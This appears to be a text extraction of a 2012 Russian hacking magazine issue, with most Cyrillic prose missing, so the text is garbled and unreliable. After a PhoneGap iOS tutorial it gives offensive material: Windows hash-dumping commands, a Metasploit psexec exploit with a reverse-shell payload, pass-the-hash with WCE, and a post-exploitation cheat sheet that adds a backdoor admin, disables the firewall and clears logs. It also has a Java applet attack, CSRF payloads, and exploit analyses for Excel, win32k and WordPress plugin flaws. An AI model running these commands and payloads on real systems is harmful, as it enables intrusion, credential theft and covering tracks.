iOS
036
iOS -,
AppStore,
:). : , , , , Android. ,
,
01 /156/ 2012
PhoneGap: HTML5

, jQuery Mobile.
JS-
(
) . ,
,
! JQuery Mobile
(jquerymobile.com/download)
, :
images/ (
jq-mobile);
index.css;
index.html;
index.js;
jquery.js;
jquery.mobile.min.css;
jquery.mobile.min.js.
, .
index.html. , .
, . iOS .
.
,
, : , . AppStore
, , . ,
. ,
.
, ,
. : -, , PhoneGap iOS.

, .
JS- jQuery c jQuery Mobile (jquerymobile.com),
Google Maps v3.
: .
.
, ( ). ,
. API.

,
. , . localStorage.
01 /156/ 2012

<div data-role="page" data-dom-cache="true"
class="page-map" id="index">
<div data-role="header">
<h1></h1>
<a href="#points" class="ui-btn-right" id="menu-points"
data-transition="pop"></a>
</div>
<div data-role="content">
<div id="map-canvas">

</div>
</div>
</div>
data-dom-cache="true" ,
.
data-transition="pop",
. ,
jQuery Mobile, (bit.ly/vtXX3M).
PHONEGAP
,
PhoneGap
. !
.
PhoneGap Build (build.phonegap.com) .

. ,
, .
-
PhoneGap,
. (github.com/
phonegap/phonegap-plugins),
iPhone, Android, Palm, BlackBerry. iOS
20 : BarcodeScanner ( -), AdPlugin ( iAd), NativeControls ( iOS
) .
037
PC ZONE
:

<div data-role="page" data-dom-cache="true"
class="page-pints" id="points">
<div data-role="header">

<a href="#" data-theme="b" data-icon="delete"
id="delete-all"> </a>
<h1></h1>

<a href="#index" class="ui-btn-right"
data-transition="pop" data-direction="reverse">
</a>
</div>
<div>

<ul id="list" data-role="listview"
data-inset="true" data-split-icon="delete">
</ul>
</div>
</div>
data-transition=pop,
data-direction=reverse,
.
. , .

,
API Google Maps, :
var latLng = new gm.LatLng(
this.options.lat, this.options.lng);
this.map = new gm.Map(element, {
zoom: this.options.zoom, //
center: latLng, //
mapTypeId: gm.MapTypeId.ROADMAP, //
disableDoubleClickZoom: true,
// /
disableDefaultUI: true
//
});
Gm , Google
Maps.
. :
this.person = new gm.Marker({
map: this.map,
icon: new gm.MarkerImage(PERSON_SPRITE_URL,
new gm.Size(48, 48))
});
PERSON_SPRITE_URL
Google-. maps.gstatic.
com/mapfiles/cb/mod_cb_scout/cb_scout_sprite_api_003.png. , , ,
, click:
gm.event.addListener(this.map, 'click', function (event) {
self.requestMessage(function (err, message) {
// , ,
if (err) return;
//
038
ExternalHosts
//
self.addPoint(event.latLng,
self.options.radius, message);
self.updatePointsList(); //
});
}, false);
.
. Geolocation API
(, ):
if (navigator.geolocation) {
// ,
function gpsSuccess(pos) {
var lat, lng;
if (pos.coords) {
lat = pos.coords.latitude;
lng = pos.coords.longitude;
} else {
lat = pos.latitude;
lng = pos.longitude;
}
self.movePerson(new gm.LatLng(lat, lng));
//
}
//
//
window.setInterval(function () {
//
navigator.geolocation.getCurrentPosition(gpsSuccess,
$.noop, {
enableHighAccuracy: true,
maximumAge: 300000
});
}, 3000);
}
movePerson
getPointsInBounds() ,
- .
? HTML5
localStorage, (
,
). , , , !
-
,
.
- Safari Chrome.
,
.
, , ,
WebKit.
- -
01 /156/ 2012
PhoneGap: HTML5
. , , Run
iPhone/iPad
PhoneGap.
, index.html , . ,
,
www. , Create folder
references for any added folders.
, . www.
PhoneGap.

phonegap-1.2.0.js . PhoneGap . . Supporting Files/PhoneGap.
plist, ExternalHosts ,
( Google
Maps): *.gstatic.com, *.googleapis.com, maps.google.com.
,
. - DOMReady jQuery:
$(document).ready(). PhoneGap deviceready,
, . :
iOS
. - ( Denwer
XAMPP), ,
.
, . ,
, PhoneGap, ,
, . ,
iOS-. ,
PhoneGap IDE
.
iOS,
Mac OS 10.6+ (
Mac OS 10.6), Xcode
iOS SDK. SDK,
Apple , Xcode iOS SDK (developer.
apple.com/devcenter/ios/index.action). ,
4 . ,
Apple (
AppStore,
). iOS Objective-C. PhoneGap, PhoneGap iOS.
(https://github.com/callback/phonegap/zipball/1.2.0),
iOS . , Xcode PhoneGap.
,
IDE -
01 /156/ 2012
document.addEventListener("deviceready", function () {
new Notificator($("#map-canvas")[0]);
// ,
//
if (navigator.network.connection.type ===
Connection.NONE) {
navigator.notification.alert(" -",
$.noop, TITLE);
}
}, false);
, -. , . navigator.notification.alert
alert, , .
, network.
connection (bit.ly/uEyRwz) (bit.ly/tkvzE2).
:
document.addEventListener("touchmove", function (event) {
event.preventDefault();
}, false);
alert confirm ,
PhoneGap:
navigator.notification.confirm(' ?',
function (button_id) {
UI-
jQuery Mobile , ,
. PhoneGap
,
(phonegap.com/tools): Sencha Touch, Impact, Dojo Mobile, Zepto.js .
039
PC ZONE
if (button_id === 1) { // OK
self.removePoint(point);
}
}, TITLE);
, , , .
, ( ,
) ,
PhoneGap:
navigator.geolocation.watchPosition(function (position) {
self.movePerson(new gm.LatLng(
position.coords.latitude,
position.coords.longitude));
}, function (error) {
navigator.notification.alert(
'code: ' + error.code + '\nmessage: ' + error.message,
$.noop,
TITLE
);
}, {
frequency: 3000
});

, . Run ,
iOS-!
.

iPhone, iPod iPad , Xcode. .
:). :

PhoneGap, ,

. .
Appcelerator Titanium (www.appcelerator.com).
Titanium
Android iPhone, BlackBerry.
,
IDE. Titanium ,
( $49 ).
$120 . Appcelerator Titanium
, 25
.
Apache 2.
Corona SDK (www.anscamobile.com/corona).
iOS Android. . ,

OpenGL. , -
: $199 $349
iOS Android. Corona IDE .
Corona , JavaScript.
040
PhoneGap-
iOS, iOS ( , iOS Developer

Program). Apple,
(Android, Windows Phone) . ,
, - . $99
. Apple ,
.
iOS App Store.
, $99 ,
.
iOS-
( ,
: bit.ly/tD6xAf). ,

. .
?
-
iOS
PhoneGap. Objective-C,
,
API PhoneGap. , Android Windows
Mobile 7, , -
, (
: phonegap.
com/start). ,
PhoneGap,
(phonegap.com/apps). PhoneGap
.
, ,
.
, HTML+JS -
, . , PhoneGap
Nitobi
( GitHub: github.com/
phonegap). ,
Nitobi Adobe.
, ? z
01 /156/ 2012
>> coding
PC ZONE
Ant (a.zhukov@real.xakep.ru)
WINDOWS-

WINDOWS-

, ,
,

,
NTLM.
.
.
?
, .
:
SAM-, LM/NTLM-
;
LSA, LM/NTLM- , ;
, MSCache-
, ( , ,
).
, AD-.
:
! , ,
. 7
.
PWDUMP
FGDUMP
,
. NTLM/LM-
.
, DLL-
SeDebugPrivilege. ,
( NT AUTHORITY\SYSTEM).
, :
,
( LiveCD), , Kon-Boot (www.piotrbania.com/all/kon-boot),
. ( NT AUTHORITY\
SYSTEM ),
EasyHack .
.
pwdump (www.foofus.net/~fizzgig/pwdump) fgdump (www.
foofus.net/~fizzgig/fgdump).
, . :
pwdump localhost
fgdump.exe

. 127.0.0.1.PWDUMP
( ) 127.0.0.1.CACHEDUMP
( ).
042
01 /156/ 2012
Windows-
,
, . , , pwdump, :
> pwdump -o mytarget.log -u MYDOMAIN\someuser -p \
'lamepassword' 10.1.1.1
10.1.1.1 , MYDOMAIN\
someuser , lamepassword , mytarget.log .
pwdump, fgdump ,
:
pwdump
> fgdump.exe -f hostfile.txt -u MYDOMAIN\someuser -T 10
hostfile.txt , , -T
10 .
,
( ).
, fgdump.exe.

VOLUME SHADOW COPY SERVICE
pwdump fgdump , , ,
. , .
,
SAM, , . ,
, SYSTEM.
,
, - . - ,
, ,
. , ,
, . , ,
Volume Shadow Copy Service ( ).
Windows XP Server 2003.
, , System
State ntbackup
(Volume Shadow Copy for Shared Folders).
,
( , SAM SYSTEM),
.

, Windows
, , .
,
. ,
, . HKEY_
LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Winlogon\cachedlogonscount 0.
, .
.
01 /156/ 2012
Windows
Credentials Editor (WCE)
, vssown.vbs
(tools.lanmaster53.com/vssown.vbs), .
.
: cscript vssown.vbs /start.
: cscript vssown.vbs /create.
: cscript vssown.vbs /list.
. Device object \\?\GLOBALROOT\
Device\HarddiskVolumeShadowCopy14 ( 14
). .
1. :
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\
windows\system32\config\SYSTEM .
windows\system32\config\SAM .
2. , -
SAMInside (insidepro.com/rus/saminside.shtml)
.
, ,
,
! ,
. ,
SAM SYSTEM. Active Directory NTDS.DIT, :
windows\ntds\ntds.dit .
, SYSTEM. ,
? SYSTEM NTDS.DIT,
?
, , NTDS.DIT , .
Csaba Barta ,
NTDS.DIT .
csababarta.com/downloads/
043
PC ZONE
ntds_dump_hash.zip. , .
BackTrack5 ( Linux-),
. ,
. libesedb:
cd libesedb
chmod +x configure
./configure && make
SAMInside
:
.
, :
cd esedbtools
./esedbdumphash ../../ntds.dit
/libesedb/esedbtools/ntds.dit.export/datatable.
. , SYSTEM:
cd ../../creddump/
python ./dsdump.py ../SYSTEM
../libesedb/esedbtools/ntds.dit.export/datatable
! !
, ( ).
, : python ./dsdumphistory.py
../system ../libesedb/esedbtools/ntds.dit.export/datatable.
, ,
( ).
HASHGRAB2 +
SAMDUMP2
, .
, ,
LiveCD (,
Offline NT Password & Registry Editor),
,
. HashGrab2 (py1337.get-root.com/tools/hashgrab2.
zip) samsump2 (sourceforge.net/projects/ophcrack/files/
samdump2/2.0.1),
LiveCD-. HashGrab2
Windows-, , samdump2
SAM SYSTEM.
> sudo ./hashgrab2.py

HashGrab v2.0 by s3my0n
http://InterN0T.net
Contact: RuSH4ck3R[at]gmail[dot]com
[*] Mounted /dev/sda1 to /mnt/jomAT8
[*] Mounted /dev/sdb1 to /mnt/AZwJUs
[*] Copying SAM and SYSTEM files...
[*] Unmounting partitions...
[*] Deleting mount directories...
[*] Deleting ['./jomAT8']
>$ ls
hashgrab2.py jomAT8.txt
>$ cat ./jomAT8.txt
Administrator:HASH
Guest:501:HASH
s3my0n:1000:HASH
HomeGroupUser$:1002:HASH
METASPLOIT
, .
Meterpreter.
Metasploit Framework
. :
meterpreter > run post/windows/gather/hashdump
.
. Metasploit ,
. PsExec:
meterpreter > use exploit/windows/smb/psexec

SAMInside
insidepro.com/rus/saminside.shtml
,
NTLM-.
.
, .
,
Windows
.
044
lm2ntcrack
ighashgpu
www.xmco.fr/lm2ntcrack/index.html
www.golubev.com/hashgpu.htm
,
. NT, LM- .
, LM- ,
NT
. ,
, LM- ADMINISTRAT0R,
, , ,
lm2ntcrack.

. , - , .
ighashgpu
GPU MD4, MD5, SHA1, NTLM,
Oracle 11g, MySQL5, MSSQL. ,
.
01 /156/ 2012
Windows-
meterpreter >
meterpreter >
meterpreter >
]
meterpreter >
meterpreter >
meterpreter >
meterpreter >
set payload windows/meterpreter/reverse_tcp

set rhost [ ]
set smbpass [
set smbuser [ ]
set lhost [ ]
exploit
shell
, , . ,
. ,
getsystem. , MS09-012, MS10-015 (KiTrap0D) .
PASS-THE-HASH
NTLM .
,
.
:). , Pass The Hash,
1997 .
Pass-the-Hash Toolkit. (oss.
coresecurity.com/projects/pshtoolkit.html): IAM.EXE, WHOSTHERE.EXE
GENHASH.EXE. , GENHASH
LM- NT- . WHOSTHERE.
EXE, -, .
, :
, / NTLM- . IAM.
EXE
- ,
(, , . .),
,
,
.
,
NTLM-,
, .
:
whosthere.exe
;
iam.exe -h administrator:mydomain:AAD3B435B51404EEAAD3B
435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
.
, , ,
.
CUDA-Multiforcer
Cain&Abel NTML
( )
WINDOWS
CREDENTIALS EDITOR
WCE Pass-the-Hash Toolkit,

.
. ,
( NTLM/LM- ):
wce.exe l

. ,
- - :
wce.exe -s <username>:<domain>:<lmhash>:<nthash> \
-c <program>.
:
wce.exe s user:Victim:1F27ACDE849935B0AAD3B435B51404EE
:579110C49145015C47ECD267657D3174 -c "c:\Program Files\
Internet Explorer\iexplore.exe"
-s user Victim, LM- NTLM-, - , .

, . :)
, , . .
, (, )
, . z
ophcrack
ophcrack.sourceforge.net
John the Ripper
www.cryptohaze.com/multiforcer.php
, .
,
nVidia. : MD5, NTLM, MD4, SHA1,
MSSQL, SHA, MD5_PS: md5($pass.$salt), MD5_SP:
md5($salt.$pass), SSHA: base64(sha1($pass.$salt)),
DOUBLEMD5: md5(md5($pass)), TRIPLEMD5, LM:
Microsoft LanMan hash .
Windows
rainbow-.
.
, , .
rainbow-. ,
,
.
NTLM-,

-. jumbo,
, NTLM.
diff',
, ( win32).
01 /156/ 2012
www.openwall.com
045
PC ZONE
WINDOWS-?
. , , Windows-,
? . ,
? -,
.
. , ,
( nmap, - ),
.
ipconfig /all
ipconfig /displaydns
DNS-.
netstat -nabo
TCP/UDP-. -b ,
, .
netstat -s -p [tcp|udp|icpm|ip]
netstat - (TCP, UDP, ICMP, IP).
netstat r
route print
.
.
netstat -na | findstr :445
, , 445.
net view
SMB ().
net user %USERNAME% /domain
( '/domain',
). , ,
, . .
net accounts
( ).
net accounts /domain
net localgroup administrators
net localgroup administrators /domain
net config workstation
, NetBIOS, , , , . .
net share
SMB-.
arp -a
ARP- .
type %WINDIR%\System32\drivers\etc\
hosts
hosts.
046
01 /156/ 2012
.
: ( ), ,
, , . .
whoami
? .
'/all' SID , SID , (
?).
whoami /all
qwinsta
, , - . RDP- (
), .
ver
( uname ), , .
set
. SET ,
. USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, ALLUSERPROFILE. .
systeminfo (XP+)
, , ,
, , .
qprocess *
, .
, ID , PID .
qappsrv
, .
schtasks /query /fo csv /v >

%TEMP%
csv, .
at
, , ,
. , SYSTEM ( Win7x64). , , BAT- do_something.bat
SYSTEM 15:41, :
at 15:41 /interactive "d:\pentest\do_something.bat"
, .
schtasks (XP+)
, . at,
schtasks ( ).
net start sc query
sc getkeyname "XXXXX"
sc queryex "XXXXX"
key name .
, PID .
tasklist (XP+)
taskkill [/f] /pid <pid>

taskkill [/f] /im <image_name>
PID
fsutil fsinfo drives
( ).
gpresult /z
- .
. , . ,
.
wevtutil el
, (, . .).
wevtutil qe <LogName>
wevtutil cl <LogName>
del %WINDIR%\*.log /a /s /q /f
WINDOWS.
01 /156/ 2012
047
PC ZONE
Windows - . -
- .
%windir%\System32\cmd.exe /c
"%SystemRoot%\system32\Dism.
exe" /online /get-features
, ,
Windows Vista SP1/7/2008/2008R2, , telnet ftp-..
%windir%\System32\cmd.exe /c
"%SystemRoot%\system32\Dism.
exe" /online /enable-feature /
featurename:TFTP
TFTP. FTP- tftp.exe

.
Ntsd server tcp:port=1337 cal.exe

Ntsd remote tcp:server=<ip>,port=1337
Windows Vista ntsd.exe,

system32. .
( ), - .
( ). .shell,
. NTSD Backdoor.
net use
,
. :
, , , (, ).
reg save HKLM\Security security.

hive
security . , , system.
reg save HKLM\SAM sam.hive
SAM, .
reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
( TargetIPaddr).
, REG ADD HKLM\Software\MyCo /v Data /t REG_BINARY /d fe340ead (: Data,
: REG_BINARY, : fe340ead).
reg export [RegDomain]\[Key]

[FileName]
reg import [FileName ]
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!]
, , .
, , C: sam_backup.dat?
, , , .
:
tree C:\ /f /a > C:\output_of_tree.txt
C: , .
dir \ /s /b | find /I "search_string"
dir (\) (/s)

base (/b) search_string, .
048
01 /156/ 2012
WMIC
, ,
WMI (Windows Management Interface).
, WMI- (WMIC): , , .
wmic baseboard get Manufacturer, Model, Product,

SerialNumber, Version
WMI
. , WMI- (computersystem, bios, ,
, baseboard) .
. .
wmic nicconfig get caption, macaddress, ipaddress,

DefaultIPGateway
: , MAC-, IP-,
.
wmic nicconfig where "IPEnabled = 'TRUE' and

DNSDomain IS NOT NULL" get DefaultIPGateway,
DHCPServer, DNSDomain, DNSHostName, DNSServerSearchOrder, IPAddress, IPSubnet, MACAddress, WINSEnableLMHostsLookup, WINSPrimaryServer, WINSSecondaryServer /format:list
wmic printer get Caption, Default, Direct, Description, Local, Shared, Sharename, Status
, .
wmic os get bootdevice, caption, csname, currenttimezone, installdate, servicepackmajorversion,

servicepackminorversion, systemdrive, version,
windowsdirectory /format:list
wmic product get Caption, InstallDate, Vendor
wmic path win32_product where "name = 'HP Software Update'" call Uninstal
HP Software Update.

, .
.
net user hacker hacker /add
hacker .
net localgroup administrators /add hacker

net localgroup administrators hacker /add
hacker .
net share nothing$=C:\ /grant:hacker,FULL /unlimited
C: hacker .
net user username /active:yes /domain
- ( , ),
.
netsh firewall set opmode disable
Windows.
wmic product get name /value

wmic product where name="XXX" call uninstall /
nointeractive
,
(, ).
rundll32.exe user32.dll, LockWorkStation
() .
01 /156/ 2012
049
/ EASY HACK
GreenDog , Digital Security (twitter.com/antyurin)
EASY
HACK
MITM RDP
-
. ,
. , ,
,
. ?
RDP,
.
.
:
,
Windows, XP 2000 ( ). ,
,
TLS. , , . 6- man-in-the-middle (MiTM),
,
, . , XP
,
. ,
RDP.
MiTM , , , , , , :).
MiTM RDP 6- :
0) ARP- DNS-. , .
1) .
2)
salt'. .
3) , .
4)
.
050
5) (
RC4).
, MiTM-. ,

. , MD5- ,
(. . ), .
,
.
, .
(goo.
gl/7yADy). RDP MiTM, . - Cain&Abel (www.oxid.it):
Sniffer Scan MAC address.
ARP ARP .
.
: ,
, .
5) arp-poisoning.
1)
2)
3)
4)
. MiTM- ARP-RDP RDP-.

, , , 6 . ?
,
. ,
. , , - Irongeek (goo.gl/Embxs).
RDP-,
, . (goo.gl/pydMZ). ,
, 2003 RPD 5.0.
01 /156/ 2012
EASY HACK
JAVA
, Java, , . , Java
, Flash, ,
. ?
, Java , . javatester.org/
version.html .
,

. ? ,
-
CVE-2010-4452, . , Metasploit':
,
Java-.
, , ,

. ? ! :)
JavaScript,
Java-,
. , ,
(defcon-russia.ru/wall.txt).
SET (Social Engineer Toolkit).
BackTrack 5
(www.social-engineer.org). SET
, .
SET :
1) :
use exploit/windows/browser/java_codebase_trust
2) :
set URIPATH test.php
set LPORT 80
3) :
Set payload java/meterpreter/reverse_tcp
4) :
Exploit
1) Website Attack Vectors;

2) The Java Applet Attack Method;
3) Web Templates (
Site Cloner );
4) Gmail Gmail;
4) Import your own executable, exe.
Meterpreter :). , Java ?

. : -
exe-. ,
, Java.
, ? ?
? ? :) ,
, , , . ,
( :)),
. , - ,
. :
SMTP (25/TCP)
, Gmail Mail.ru.
, , , , ,
, -
. ?
150 . ,
IP.
3proxy (www.3proxy.ru), ,
. 3APA3A. , security.nnov.ru
,
, ,
. :)
( *), (
)
:
- .
,
. - 3proxy. ,
?
( ).
, , -
( www.example.com:25). ,
. , nmap
.
, UDP ICMP, TCP, TCP-ACK. ,
.
proxy p25
01 /156/ 2012
051
/ EASY HACK
REVERSE-
, reverse. ? ,
-, () -
. ? . ,
reverse-
-, WAF
SSL-, , (,
). .
,
(,
- ?). .
reverse-
. ?

-. . , X-Forwarded-For,
, ! , HTTP
, .
(goo.gl/V0beW). HTTP,
RFC 2616 1.1, ,
Max Forwards. , , TRACE OPTIONS.
-
.
HTTP-traceroute. Squid
reverse- Wikipedia.org
,
, ,
. , GET POST,
. , TTL IP-.
,
- ,
HTTP- traceroute. , TRACE-
-,
RFC, GET
MaxForwards. traceroute,
, IP- .
:
HTTP-Traceroute.py -t www.victim.com
GET/POST)
- CSRF
, CSRF (ross Site Request Forgery,

). ,
-. ,
,
(, ),
(,
). , , ,
,
. ,
, JavaScript. ,
- -
. .
GET- : http://
server.com/change_password.php?NP=new_pass, new_pass
, . ,
HTML' :
<iframe src= http://server.com/change_password.php?NP=
new_pass></iframe>
052
reverse proxy
-m (TRACE/
. GET- . ,
POST?
:
<form name=passwd action=
"http://server.com/change_password.php" method="post">
<input type=hidden name= NP value= new_pass >
<input type="submit">
</form>
<script>document.passwd.submit();</script>
! XML? XML-. :)
<form name=passwd ENCTYPE="text/plain"
action="http://server.com/change_password.php"
METHOD="POST">
<input type=hidden name='<?xml version'
value='"1.0"?><User><Password>new_pass</Password></User>'>
</form>
<script>document.passwd.submit();</script>
, , . ;).
01 /156/ 2012
EASY HACK
(, , digital
forensics) ,
.
,
, .
, :
;
;
;
DLL- ;
;
;
;
Virtual Address Descriptor;
;
..
, , , ,
.
Volatility (goo.gl/
Hi5ip). Python'
Windows ( XP), , 32-. , ,
. ,
.
(
), ,
. ,
, MoonSols DumpIt (http://goo.gl/BY1QN).
- :
. . , ,
( ,
USB).
, ? Volatility.
, Python', standalone-, .
, :
volatility.exe imageinfo f d:\test.raw
:
imageinfo ;
f d:\test.raw .
Volatility - . ;)
(WinXPSP3x86),
. , ?

:
volatility pslist -f d:\test.raw --profile=WinXPSP3x86
, , :
volatility netscan -f d:\test.raw --profile=WinXPSP3x86
- , ,
, SAM, -
LSA?
Windows .
volatility hivelist -f d:\test.raw --profile=WinXPSP3x86
hivelist ,
.
,
:
volatility hashdump -f d:\test.raw --profile=WinXPSP3x86
-y 0xe1035b60 -s 0xe1805b60
:
hashdump ;
y 0xe1035b60 System;
s 0xe1805b60 SAM.
01 /156/ 2012
, . ,
. ,
, . Volatility.
,
, .
053
(ivinside.blogspot.com)
(115612, . , .1)

. ,

, ,

, ,
.
054
Microsoft Office 2007

Excel .xlb
CVSSV2
9.3
(AV:N/AC:M/AU:N/C:C/I:C/A:C)
BRIEF
: 5 2011 .
: Aniway, abysssec, sinn3r, juan vazquez.
CVE: CVE-2011-0105.
,
xlb Excel.
.
EXPLOIT
Excel ,
(, ).
xlb.
01 /156/ 2012
ajax_save_name.php
BIFF8.
,
. BIFF-
:
BOF Type = workbook globals
Workbook globals
...
EOF
BOF Type = worksheet
Sheet records
EOF
BOF Type = worksheet
Sheet records
EOF
...
ID ( )
, sz ( )
(sz )
(ID ) . .
: BOF (Begin Of File) EOF (End Of File).
BOF, :
0809H
0010H
0600H
****H
BOF-:
0005H Workbook globals
01 /156/ 2012
Visual Basic module

Worksheet
Chart
BIFF4 Macro sheet
BIFF4 Workbook globals
BOF 0xA7.
,
0x3C.
sub_30199E55.
. .
, ,
,
.
BOF, BIFF8
.
2
2
00
2
02
2
04
2
06
2
08
4
12
4
0006H
0010H
0020H
0040H
0100H
ID
ID

Excel,

.text:3053F830
.text:3053F835
.text:3053F838
.text:3053F83E
.text:3053F844
.text:3053F849
.text:3053F84F
.text:3053F856
.text:3053F858
.text:3053F85E
.text:3053F862
.text:3053F867
.text:3053F869
.text:3053F86A
.text:3053F86C
.text:3053F86E
.text:3053F86F
.text:3053F870
.text:3053F872
call sub_301A0A01
cmp eax, 3Ch
mov [ebp+var_ED4], eax
jnz loc_30540488
call sub_301A0A01
mov ecx, [ebp+var_EDC]
imul ecx, [ebp+var_F00]
mov edi, eax
mov eax, [ebp+var_EE0]
lea ebx, [ecx+eax+3]
call sub_301A0ABE
push 0FFFFFFFDh
pop edx
sub edx, ecx
add eax, edx
push eax ; Dst
push ebx ; int
mov eax, edi
call sub_30199E55
, sub_30199E55 ,
. ,
.
055
CheckFile()
.text:30199E60
.text:30199E64
.text:30199E6A
.text:30199E6E
.text:30199E6F
.text:30199E75
.text:30199E76
.text:30199E7C
.text:30199E7D
...
.text:30199E93
.text:30199E97
.text:30199E98
.text:30199E9E
.text:30199E9F
.text:30199EA0
.text:30199EA2
.text:30199EA7
.text:30199EAB
.text:30199EAD
.text:30199EB0
.text:30199EB2
.text:30199EB8
cmp edi, [esp+4+Dst]

ja loc_303EE1B7
mov ecx, [esp+4+arg_0]
push ebx
mov ebx, dword_30F726C0
push ebp
mov ebp, nNumberOfBytesToRead
push esi
mov [esp+10h+Dst], ecx
mov eax, [esp+10h+Dst]
push esi ; Size
lea edx, dword_30F6E6B8[ebx]
push edx ; Src
push eax ; Dst
sub edi, esi
call memcpy
add [esp+1Ch+Dst], esi
add ebx, esi
add esp, 0Ch
test edi, edi
mov dword_30F726C0, ebx
jnz loc_301E0DB3
PE-.
, .
, .
memcpy,
, /GS. ,
esp . ,
call esp.
TARGETS
Microsoft Office Excel 2007/Microsoft Office Excel 2007 SP2.

SOLUTION
, .
MS11-077 Win32k Null Pointer De-reference

Vulnerability POC
CVSSV2
7.2
(AV:L/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
,
. ,
/GS /SAFESEH. , /GS
MS Visual Studio, , .
,
,
.
cookie,
.
64-
, ,
cookie. , ,
. . /SAFESEH
SEH- .
,
,
. ,
. Visual Studio
/SAFESEH
056
: 23 2011 .
: KiDebug.
CVE: CVE-2011-1985.
win32k.sys , . .
EXPLOIT
:
.text:BF9140C0 ; __stdcall NtUserfnINCBOXSTRING(x,x,x,x,x,x,x)
.text:BF9140C0 _NtUserfnINCBOXSTRING@28 proc near
; CODE XREF: xxxDefWindowProc(x,x,x,x)+6E|p
.text:BF9140C0
; NtUserMessageCall(x,x,x,x,x,x,x)+61|p ...
.text:BF9140C0
.text:BF9140C0 HWND
= dword ptr 8
.text:BF9140C0 arg_4
= dword ptr 0Ch
= dword ptr 10h
.text:BF9140C0 arg_C
= dword ptr 14h
= dword ptr 18h
= dword ptr 1Ch
= dword ptr 20h
01 /156/ 2012
,
BSoD:
.text:BF9140C0
.text:BF9140C0
mov
edi, edi
.text:BF9140C2
push
ebp
.text:BF9140C3
mov
ebp, esp
.text:BF9140C5
mov ecx, [ebp+HWND]
; HWND == 0xffffffff (-1),
.text:BF9140C8
mov eax, [ecx+20h] ; BSOD
...
NtUserMessageCall NtUserfnINCBOXSTRING
, CB_ADDSTRING:
.text:BF80EE6B ; int __stdcall NtUserMessageCall(int,
int, int UnicodeString, PVOID Address, int, int, int)
...
.text:BF80EEB1
push
[ebp+arg_18]
; int
.text:BF80EEB4
movzx
eax, ds:_MessageTable[eax]
.text:BF80EEBB
push
ecx
; int
.text:BF80EEBC
push
[ebp+arg_10]
; int
.text:BF80EEBF
and
eax, 3Fh
.text:BF80EEC2
push
[ebp+Address]
; Address
.text:BF80EEC5
push
[ebp+UnicodeString] ; int
.text:BF80EEC8
push
[ebp+arg_4]
; int
.text:BF80EECB
push
esi
; int
.text:BF80EECC
call
ds:_gapfnMessageCall[eax*4]
; NtUserfnINSTRINGNULL(x,x,x,x,x,x,x)
...
.rdata:BF990D68 _gapfnMessageCall dd offset _NtUserfnNCDESTROY@28
.rdata:BF990D68
; DATA XREF: NtUserMessageCall(x,x,x,x,x,x,x)
.rdata:BF990D68
; NtUserfnNCDESTROY(x,x,x,x,x,x,x)
.rdata:BF990D6C
dd offset _NtUserfnNCDESTROY@28
; NtUserfnNCDESTROY(x,x,x,x,x,x,x)
.rdata:BF990D70
dd offset _NtUserfnINLPCREATESTRUCT@28
; NtUserfnINLPCREATESTRUCT(x,x,x,x,x,x,x)
...
.rdata:BF990DD4
dd offset _NtUserfnINCBOXSTRING@28
; NtUserfnINCBOXSTRING(x,x,x,x,x,x,x)
...
,
SendMessageCallback((HWND)-1,CB_ADDSTRING,0,0,0,0);
SendNotifyMessage((HWND)-1,CB_ADDSTRING,0,0);
01 /156/ 2012
CB_ADDSTRING
CB_INSERTSTRING
CB_FINDSTRING
CB_SELECTSTRING
CB_FINDSTRINGEXACT
LB_ADDSTRING
LB_INSERTSTRING
LB_SELECTSTRING
LB_FINDSTRING
LB_FINDSTRINGEXACT
LB_INSERTSTRINGUPPER
LB_INSERTSTRINGLOWER
LB_ADDSTRINGUPPER
LB_ADDSTRINGLOWER
0x0143
0x014A
0x014C
0x014D
0x0158
0x0180
0x0181
0x018C
0x018F
0x01A2
0x01AA
0x01AB
0x01AC
0x01AD
TARGETS
Windows XP SP3/XP SP2 x64, Windows 2003 Server SP2 (+ itanium,x64),

Windows Vista SP2/SP2 x64, Windows Server 2008 SP2 x32/x64/
itanium, Windows 7 x32/x64, Windows 7 SP1 x32/x64, Windows Server
2008 r2 x64/itanium, r2 sp1 x64/itanium.
SOLUTION
MS11-077, .
Wordpress
Zingiri Web Shop Plugin
CVSSV2
7.5
(:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
WordPress
. , ,
.
-,

,
.
Egidio Romano aka EgiX . EgiX
13 , ,
.
EXPLOIT
/fws/addons/
tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_
name.php, 3756
.
$selectedDocuments POST- value.
$selectedDocuments
displayArray() writeInfo(), , $selectedDocuments. writeInfo(), /fws/addons/
tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_create_
folder.php:
function writeInfo($data, $die = false)
{
$fp = @fopen(dirname(__FILE__) .
DIRECTORY_SEPARATOR . 'data.php', 'w+');
@fwrite($fp, $data);
057
if ($_POST['templateName']) {
$dir = '../../../../content/editor_templates/'.
$_SESSION['s_login'];
if (!is_dir($dir) && !mkdir($dir, 0755)) {
throw new Exception(_COULDNOTCREATEDIRECTORY);
}
$filename = $dir.'/'.$_POST['templateName'].'.html';
$templateContent = $_POST['templateContent'];
if(file_exists($filename) === false) {
$ok = file_put_contents($filename,
$templateContent);
chmod($filename, 0644);
GetUserTimeTarget()
@fwrite($fp, "\n\n" . date('d/M/Y H:i:s') );

@fclose($fp);
...
! data.php,

-.
exploit-db.com (EDB-ID: 18111). PHP,
PHP.
,
, :
// Arch Linux
# pacman -S php
// Debian-based
# apt-get install php
:
$ php 18111.php <host> <path>
<host> , <path> WordPress.

, Joomla!, -
CONFIG_SYS_ROOT_PATH.
SOLUTION
2.2.4 .
2. . checkFile(), /libraries/filesystem.
class.php, 31433154
. FileSystemTree::uploadFile(),
, checkFile() . , ,
file_black_list,
php, php3, jsp, asp, cgi, pl, exe, com,
bat.
php.
eFront
CVSSV2
7.5
(AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
EgiX

eFront.
,
, .
EXPLOIT
1. .
/www/editor/tiny_mce/plugins/save_template/save_template.php
( 818):
058
POST /efront/www/editor/tiny_mce/plugins/
save_template/save_template.php HTTP/1.1
Host: localhost
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
